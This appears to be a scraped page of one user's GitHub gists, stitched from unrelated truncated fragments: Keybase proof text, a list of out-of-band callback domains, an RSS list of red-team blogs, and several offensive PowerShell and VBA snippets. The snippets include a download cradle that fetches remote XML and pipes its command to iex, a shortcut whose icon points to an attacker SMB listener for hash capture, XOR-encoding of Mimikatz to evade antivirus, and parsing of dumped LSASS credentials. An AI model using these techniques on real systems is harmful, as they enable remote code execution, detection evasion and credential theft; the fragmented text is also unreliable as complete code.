I hereby claim:
- I am breakersall on github.
 - I am breakersall (https://keybase.io/breakersall) on keybase.
 - I have a public key ASDNWjIrvzU3731TQaVF4SQ8zzSuGTG46jMIxSvVgt9Gpgo
 
To claim this, I am signing this object:
| interact.sh | |
| oast.pro | |
| oast.live | |
| oast.site | |
| oast.online | |
| oast.fun | |
| oast.me | |
| burpcollaborator.net | |
| oastify.com | |
| canarytokens.com | 
| # Copied from Lee Homes / @Lee_Holmes code copied from https://www.youtube.com/watch?time_continue=206&v=1S9YNJpktBM | |
| $ip = "8.8.8.8" | |
| $port = "80" | |
| $tcpClients = New-Object System.Collections.ArrayList | |
| $Counter = 0 | |
| while($true) | |
| { | |
| "Lauching Client $counter" | |
| $counter++ | 
| <?xml version="1.0" encoding="UTF-8"?> | |
| <opml version="1.0"> | |
| <head> | |
| <title>Matt subscriptions in feedly Cloud</title> | |
| </head> | |
| <body> | |
| <outline text="RedTeaming" title="RedTeaming"> | |
| <outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/> | |
| <outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/> | 
I hereby claim:
To claim this, I am signing this object:
| $proxy = [System.Net.WebRequest]::GetSystemWebProxy() | |
| $proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials | |
| $wc.proxy = $proxy | |
| $d = New-Object System.Xml.XmlDocument | |
| $d.Load($wc.DownloadData("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")); | |
| $d.command.a.execute | iex | 
| $LinkedEXE = "$env:SystemRoot\System32\notepad.exe" | |
| $LNKSaveFile = "pathtosavelnk" | |
| $WScriptShell = New-Object -ComObject Wscript.Shell | |
| $Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile) | |
| $Shortcut.TargetPath = $LinkedEXE | |
| $Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico" | |
| $Shortcut.save() | |
| Sub zxzcvzxcvzxvxzcv() | |
| ' | |
| myAppleScript = "do shell script ""/usr/bin/python -c 'import webbrowser; webbrowser.open_new(\""http://google.com\"")' """ | |
| MacScript (myAppleScript) | |
| ' | |
|  | |
| End Sub | 
| #######EncodeExample | |
| $inputMim = "C:\Tools\Mimikatz.txt" | |
| $OutMimEnc = "C:\Tools\EncMimikatz.txt" | |
| $bytes = [System.IO.File]::ReadAllBytes("$inputMim") | |
| $key = 137 | |
| for($i=0; $i -lt $bytes.count ; $i++) | |
| { | |
| $bytes[$i] = $bytes[$i] -bxor $key | |
| } | |
| [System.IO.File]::WriteAllBytes("$OutMimEnc", $bytes) | 
| Function ParseMimiLsass | |
| { | |
| $UnameRegex = '^*[Username]{8}' | |
| $DomainRegex = '^*[Domain]{6}' | |
| $PassRegex = '^*[Password]{8}[ ][:]' | |
| $Domains = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $DomainRegex | Select-Object Line | |
| $Usernames = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $UnameRegex | Select-Object Line | |
| $Passwords = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $PassRegex | Select-Object Line | |
| $Domains32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $DomainRegex | Select-Object Line | |
| $Usernames32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $UnameRegex | Select-Object Line | 
| #Number of minutes to go | |
| [int]$MinutesToCheck = 10080 | |
| function Find-4648Logons | |
| { | |
| <# | |
| .SYNOPSIS | |
| Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give the | |
| the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful | |
| for identifying normal authenticaiton patterns. Other actions that will trigger this include any runas action. | |
| Function: Find-4648Logons |